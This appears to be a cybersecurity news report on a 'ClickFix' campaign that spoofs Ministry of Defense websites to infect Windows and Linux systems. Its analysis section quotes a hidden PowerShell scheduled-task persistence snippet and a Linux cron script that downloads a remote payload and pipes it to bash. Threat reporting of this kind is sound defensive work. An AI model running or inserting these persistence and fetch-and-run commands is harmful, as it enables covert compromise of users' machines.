New ClickFix Attack Mimics Ministry of Defense Website to Attack Windows & Linux Machines

Cybersecurity experts have identified a sophisticated new malware campaign dubbed “ClickFix” that employs advanced social engineering tactics to compromise both Windows and Linux systems.

The attack creates convincing replicas of Ministry of Defense websites across multiple countries, tricking users into downloading what appears to be required security updates or official documents.

Upon execution, the malware establishes persistent access while employing multiple evasion techniques to remain undetected on infected systems.

Initial analysis suggests the campaign began in early April 2025, primarily targeting government contractors, defense industry employees, and military personnel through spear-phishing emails containing links to the fraudulent websites.

The spoofed sites employ valid SSL certificates and domain names closely resembling legitimate government domains with minor typographical variations, such as replacing hyphens with underscores or using slight misspellings that often go unnoticed by casual visitors.

Hunt.io researchers noted the attack after observing unusual network traffic patterns from several defense contractor networks.

“What makes ClickFix particularly concerning is its cross-platform capabilities and the sophistication of its mimicry,” said Dr. Eliza Chen, lead threat analyst at Hunt.io.

Their investigation revealed the attackers leverage country-specific design elements and exact replications of legitimate ministry portals, complete with functioning links to authentic resources, making the deception extremely convincing.

The malware demonstrates remarkable versatility, deploying tailored payloads depending on the target operating system.

On Windows machines, it exploits a previously undocumented vulnerability in the Windows Management Instrumentation (WMI) service, while Linux systems face exploitation through a common dependency injection technique in shared libraries.

In both cases, the malware establishes persistence, creates a backdoor, and begins harvesting sensitive information from the compromised systems.

Security agencies across multiple countries have issued alerts following confirmation that the campaign has successfully breached several mid-level defense contractors and at least two government agencies.

Attribution remains unclear, though analysis of the command-and-control infrastructure suggests a sophisticated threat actor with significant resources.

Infection Mechanism Analysis

The infection process begins when victims click on a download button for an apparent “required security certificate” or “document viewer plugin.”

The downloaded file appears legitimate but contains obfuscated code that executes a multi-stage infection routine. The Windows variant utilizes a PowerShell script that creates a scheduled task for persistence:-

$Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -EncodedCommand $encodedPayload"
$Trigger = New-ScheduledTaskTrigger -AtStartup
$Settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden
Register-ScheduledTask -TaskName "WindowsSecurityManager" -Action $Action -Trigger $Trigger -Settings $Settings -RunLevel Highest

For Linux systems, the malware writes to system initialization files and creates a camouflaged service that appears related to security functions:

echo "#!/bin/bash
nohup curl -s http://defense-update.security[.]net/payload.sh | bash &" > /etc/cron.daily/system-security-check
chmod +x /etc/cron.daily/system-security-check

The spoofed Ministry of Defense login portal showing security certificate update notification.

Hunt.io researchers recommend organizations implement additional verification steps for government communications and enhance endpoint protection with behavioral analysis capabilities to detect the distinctive patterns of ClickFix infections before data exfiltration occurs.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.